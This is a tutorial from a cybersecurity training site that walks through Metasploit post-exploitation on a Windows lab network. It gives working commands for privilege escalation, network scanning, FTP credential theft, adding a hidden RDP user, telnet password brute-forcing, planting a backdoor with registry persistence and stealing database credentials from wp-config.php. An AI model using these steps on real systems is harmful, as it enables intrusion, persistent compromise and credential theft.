Post Exploitation Hacking Techniques

June 15, 2016 | Views: 17719

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Hello there,

This is my first OP3N submission and we’ll talk about post exploitation hacking techniques you can use after having a meterpreter shell on a remote system.


You’ll see things like:

  1. Privilege Escalation
  2. Maintaining Access
  3. Data Harvesting
  4. Weak Password Cracking

NOTE: Don’t take this guide as standard methodology. The purpose is to show different “tips and tricks” you can use in post exploitation phases.



Start the Handler

We’re assuming we already have a backdoor installed on the remote system. Let’s have our handler running and waiting for remote connections:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4466
LPORT => 4466
msf exploit(handler) > exploit
[*] Started reverse handler on
[*] Starting the payload handler…
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 1 opened ( ->



Privilege Escalation

Now that we have our session running some privilege escalation commands, let’s get higher privileges on the system:

meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid



Map the Network

An easy way to map the internal network is by running arp_scanner module:

meterpreter > run arp_scanner –r
[*] ARP Scanning
[*] IP: MAC 00:50:56:b1:eb:b8
[*] IP: MAC 00:50:56:b1:eb:9a
[*] IP: MAC 00:50:56:b1:eb:dd
[*] IP: MAC 00:50:56:b1:eb:de
[*] IP: MAC 00:50:56:b1:eb:df
meterpreter >

As you see there are 5 total hosts on the network.



Port Scan

Once we’ve listed all internal hosts, we need to run a TCP scan to check for open ports.
That will help us to also identify the role of each system inside the network. To do that, we first need to background our current session and run the tcp_scanner module:

meterpreter > background
[*] Backgrounding session 4…
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS
msf auxiliary(tcp) > run
[*] – TCP OPEN
[*] – TCP OPEN
[*] – TCP OPEN



Data Harvesting

There’s a chain of commands for this purpose and we’ll see a few of them.

Figured out installed application

meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on LS-WINXP
Installed Applications
FileZilla Client 3.5.3
Microsoft Visual C++ 2008 Redistributable – x86
Microsoft Visual C++ 2010 x86 Redistributable
Security Update for Windows XP (KB958644)
VMware Tools
WebFldrs XP
[*] Results stored in:
meterpreter >


We find Filezilla runing on the system and already know that Metasploit has a module to get credentials from FTP software like Filezilla.

meterpreter > run post/multi/gather/filezilla_client_cred
[*] Checking for Filezilla directory in: C:Documents and
SettingsLSAdminApplication Data
[*] Found C:Documents and SettingsLSAdminApplication DataFileZilla
[*] Checking for Filezilla directory in: C:Documents and
SettingsAdministratorApplication Data
[*] Reading sitemanager.xml and recentservers.xml files from C:Documents
and SettingsLSAdminApplication DataFileZilla
[*] Parsing sitemanager.xml
[*] Collected the following credentials:
[*] Server:
[*] Protocol: FTP
[*] Username: lsuser_ftp
[*] Password: FTPStrongPwd
[*] Parsing recentservers.xml
[*] Collected the following credentials:
[*] Server:
[*] Protocol: FTP
[*] Username: lsuser_ftp
[*] Password: FTPStrongPwd
meterpreter >

We also found a new host with the IP:



Exploit the Server

In the previous step, we discovered a new host with IP: running a FTP service on it. Before getting more info about it, let’s try to connect to this system by creating RDP user. For that, we have to interact with our running meterpreter shell and create a new RDP user. Plus, we have to start the RDP service on remote system.

meterpreter > shell
Process 1100 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:Documents and SettingsLSAdmin> net user guest_1 guestpwd /add
net user guest_1 guestpwd /add
C:Documents and SettingsLSAdmin> net localgroup “Remote Desktop Users”
guest_1 /add
net localgroup “Remote Desktop Users” guest_1 /add
The command completed successfully.
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by
[*] Carlos Perez
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it …
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it…
[*] For cleanup use command: run multi_console_command -rc
meterpreter >

We can login to it with :
root@kali:~# rdesktop -u guest_1
After getting the RDP, you’ll be asked also for the password.



Port Scan

Let’s run a TCP scan on the server to check further for open ports. To do that, we first need to add a route to the machine – we have to use victim 1 as a bridge.

meterpreter > run autoroute -s
[*] Adding a route to…
[+] Added route to via
[*] Use the -p option to list all active routes
meterpreter >

Now, we can run our scanner module:

meterpreter > background
[*] Backgrounding session 2…
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS
msf auxiliary(tcp) > run
[*] [*] [*] [*] [*] [*] … – TCP OPEN – TCP OPEN – TCP OPEN – TCP OPEN – TCP OPEN – TCP OPEN



Web Server

Previously, we found a web server running on intranet. We will port forward the server to us to access the site:

meterpreter > portfwd add -l 8001 -p 80 -r
[*] Local TCP relay created: <->
meterpreter >

We should be able to access the internal web site by visiting localhost:8001



Weak Password Cracking

On previous tasks, we found also port 23 open on system. Without any service detection, we can figure out there’s probably an Telnet service on. Let’s try to crack the password using telnet cracker auxiliary:

msf auxiliary(tcp) > use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set RHOSTS
msf auxiliary(telnet_login) > set PASS_FILE /root/Desktop/pwd.txt
PASS_FILE => /root/Desktop/pwd.txt
msf auxiliary(telnet_login) > set USER_FILE /root/Desktop/username.txt
USER_FILE => /root/Desktop/username.txt
msf auxiliary(telnet_login) > set THREADS 15
msf auxiliary(telnet_login) > set USER_AS_PASS false
USER_AS_PASS => false
msf auxiliary(telnet_login) > set STOP_ON_SUCCESS true
msf auxiliary(telnet_login) > exploit

[*] TELNET – [00009/10000] – Banner: Welcome to Microsoft
Telnet Service login:
[*] TELNET – [00009/10000] – Prompt: netadmin password:
[*] TELNET – [00009/10000] – Result: The handle is
invalid. Login Failed login:
[*] Telnet – [00010/10000] – Attempting:
[*] TELNET – [00010/10000] – Banner: Welcome to Microsoft
Telnet Service login:
[*] TELNET – [00010/10000] – Prompt: netadmin password:
[*] TELNET – [00010/10000] – Result: The handle is
invalid. Login Failed login:
[*] Telnet – [00011/10000] – Attempting:
[*] TELNET – [00011/10000] – Banner: Welcome to Microsoft
Telnet Service login:
[*] TELNET – [00011/10000] – Prompt: netadmin password:
[*] TELNET – [00011/10000] – Result:
Microsoft Telnet Server.
[+] – SUCCESSFUL LOGIN netadmin : abc123
[*] Attempting to start session with netadmin:abc123
[*] Command shell session 2 opened (Local Pipe -> Remote Pipe)
[*] Auxiliary module execution completed
msf auxiliary(telnet_login) >



Uploading a Backdoor

* Create a backdoor

root@kali:~# cd /pentest/exploits/framework3/
root@kali:/pentest/exploits/framework3# ./msfvenom
windows/meterpreter/bind_tcp LPORT=2444 X > /root/Desktop/msf_bind.exe
Created by msfpayload (
Payload: windows/meterpreter/bind_tcp
Length: 298
Options: {“LPORT”=>”2444”}

Upload it to the remote system and execute it through telnet (as we have the credentials):

meterpreter > upload /root/Desktop/msf_bind.exe ‘C:\Documents and
Settings\LSAdmin\Local Settings\Temp\msf_bind.exe’
[*] uploading : /root/Desktop/msf_bind.exe -> C:\Documents and
Settings\LSAdmin\Local Settings\Temp\msf_bind.exe
[*] uploaded
: /root/Desktop/msf_bind.exe -> C:\Documents and
Settings\LSAdmin\Local Settings\Temp\msf_bind.exe
meterpreter >

Run the backdoor using the Telnet session

msf auxiliary(telnet_login) > sessions -i 2
[*] Starting interaction with 2…
C:>cd inetpub
cd inetpub
C:inetpub>cd ftproot
cd ftproot

Next, we set up a new handler and wait for connections:

msf auxiliary(tcp) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set RHOST
msf exploit(handler) > set LPORT 2444
LPORT => 2444
msf exploit(handler) > exploit
[*] Starting the payload handler…
[*] Started bind handler
[*] Sending stage (752128 bytes)
[*] Meterpreter session 4 opened ( ->
meterpreter >



Privilege Escalation

NOTE: Don’t forget – the first thing you want to do after gaining access to remote system is to escalate you privileges (after migration of course). Let’s run one more:

meterpreter > getsystem
…got system (via technique 4).
meterpreter > getuid
meterpreter >



Maintaining Access

Getting just high privileges isn’t enough, right? Let’s add a value in the registry in order to run our backdoor on startup so we can access the system any time we want:

meterpreter > reg setval -k
‘”C:inetpubftprootmsf_bind.exe”‘ -v msf_bind
Successful set msf_bind.
meterpreter >
Where –k indicates the registry key path, -d the value of the value of the key and –v the name.



Data Harvesting

We know the system is running a web server and is probably connected to a database. Let’s find  usernames and passwords for this site. The easier way is by looking up the config file of the site by downloading it:

meterpreter > ls
Listing: C:inetpubwwwrootintranet

Mode                              Size        Type     Name
—-                                  —-          —-     —-
40777/rwxrwxrwx       0             dir      .
40777/rwxrwxrwx       0             dir      ..
100666/rw-rw-rw-      397         fil      index.php
100666/rw-rw-rw-      16899    fil      licence.txt
100666/rw-rw-rw-      9202      fil      readme.html

100666/rw-rw-rw-      3982      fil      wp-comments-post.php
post.php                         3165      fil      wp-config.php
100666/rw-rw-rw-      0           dir      wp-content

meterpreter > download wp-config.php /root/Desktop/conf.php
[*] downloading: wp-config.php -> /root/Desktop/conf.php/wp-config.php
[*] downloaded : wp-config.php -> /root/Desktop/conf.php/wp-config.php
meterpreter >


And, finally, the credentials we need:

DB NAME                  intranet
DB USER                   root
DB PASSWORD       LSMySqlDBPwd0905
DB HOST        


That’s it for now, folks. Hope you find this useful!




Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. Thank you.
    most of this is also explained (and well explained) by Dean Pompilio in the “Metasploit” course on Cybrary.

Page 3 of 3«123
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?